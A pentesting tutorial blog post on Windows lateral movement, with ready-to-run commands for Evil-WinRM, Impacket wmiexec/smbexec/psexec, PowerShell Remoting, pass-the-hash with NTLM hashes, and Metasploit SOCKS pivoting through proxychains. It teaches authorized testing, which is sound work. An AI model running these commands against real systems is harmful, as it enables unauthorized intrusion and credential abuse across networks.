Windows Lateral Movement for Pentesters
When you’ve compromised one machine in an Active Directory environment, the next logical step is to move laterally — hopping from system to system using valid credentials or tokens. In this post, we’ll focus purely on lateral movement techniques and the tools that help make it happen.
We’ll cover:
- Core concepts of lateral movement
- Key tools: Evil-WinRM, WMIExec, SMBExec, PSExec, PowerShell Remoting, RioGeorge
- Pivoting techniques with SOCKS proxies and Metasploit
What Is Lateral Movement?
Lateral movement refers to the technique of moving from one compromised host to another within a network. It’s all about using the access you’ve gained to reach other systems — ideally ones with more privileges or sensitive data.
Unlike privilege escalation, this isn’t about going up — it’s about going sideways. Same domain, different box.
Prerequisites for Lateral Movement
- Valid domain or local credentials (username + password or NTLM hash)
- Target host must allow remote management (e.g., WinRM, SMB, WMI, RDP)
- Necessary ports must be open (e.g., 445, 5985, 135, 3389)
Tools for Windows Lateral Movement
Here’s a breakdown of the key tools you should know:
1. Evil-WinRM
The go-to tool for remote shell access over WinRM.
evil-winrm -i 10.10.10.10 -u administrator -p 'Password123'
You can also use a hash:
evil-winrm -i 10.10.10.10 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0'
Requirements:
- Port 5985 or 5986 (WinRM)
- Remote host must have WinRM enabled
- Admin rights required on the target
2. WMIExec.py (Impacket)
Executes commands via WMI, returns output line by line.
python3 wmiexec.py administrator:'Password123'@10.10.10.10
With a hash:
python3 wmiexec.py 'domain/administrator@10.10.10.10' -hashes aad3b435b51404eeaad3b435b51404ee:hashhere
Silent and less noisy than SMBExec. Requires admin privileges.
3. SMBExec.py (Impacket)
Executes commands via SMB (like WMIExec, but uses services).
python3 smbexec.py domain/administrator:Password123@10.10.10.10
More invasive than WMIExec since it drops a service.
4. PSExec.py (Impacket)
Remote command execution using SMB + Admin shares.
python3 psexec.py administrator:Password123@10.10.10.10
Or with a hash:
python3 psexec.py -hashes :NTLMHASH administrator@10.10.10.10
Requires ADMIN$ access and admin privileges on the target.
5. PowerShell Remoting (Enter-PSSession / Invoke-Command)
Enable remoting on the target (if not already):
Enable-PSRemoting -Force
Connect to remote host:
Enter-PSSession -ComputerName 10.10.10.10 -Credential (Get-Credential)
Run a command remotely:
Invoke-Command -ComputerName 10.10.10.10 -ScriptBlock { whoami } -Credential (Get-Credential)
Port 5985/5986 must be open. Requires WinRM to be enabled and firewall configured.
6. RioGeorge (C# lateral movement toolkit)
RioGeorge is a stealthier tool designed for red team lateral movement using different techniques (WMI, DCOM, etc.) via C# payloads.
- Supports various execution methods (WMI, PSRemoting, DCOM)
- Good for OPSEC-sensitive operations
- Can be used in C2 frameworks or manually compiled for execution
Sample use case: compile it and use it with a valid token or credential to execute a command remotely without dropping binaries to disk.
Note: You’ll need to build this from source or use precompiled binaries. It’s often used in mature red team setups.
Pivoting with SOCKS and Metasploit
If you can’t reach a host directly but can reach it from another compromised box, it’s time to pivot.
Use autoroute and SOCKS in Metasploit
- From your Meterpreter session, add a route:
run autoroute -s 10.10.20.0/24
- Start SOCKS proxy in Metasploit:
use auxiliary/server/socks_proxy
set SRVPORT 1080
run
- Add to
/etc/proxychains4.conf:
socks4 127.0.0.1 1080
- Now run tools like
smbclient,wmiexec.py, orcrackmapexecthrough ProxyChains:
proxychains4 python3 wmiexec.py administrator@10.10.20.5
Summary of Tools and When to Use Them
| Tool | Protocol | Use Case |
|---|---|---|
| Evil-WinRM | WinRM | Remote shell with credentials/hash |
| WMIExec.py | WMI (DCOM) | Lightweight, command-by-command exec |
| SMBExec.py | SMB | Executes commands via services |
| PSExec.py | SMB | Admin share access, stable shell |
| PowerShell Remoting | WinRM | Remote PS command execution |
| RioGeorge | C# based | Stealthy red team ops, native calls |
| ProxyChains + Metasploit | All | Pivot into unreachable subnets |
Final Thoughts
Mastering lateral movement is essential in any Windows network pentest. Each environment is different — some hosts might have WinRM open, others might restrict SMB, some might log WMI heavily. Choose your tool based on what ports are open, what level of stealth you need, and what creds you’ve got in hand.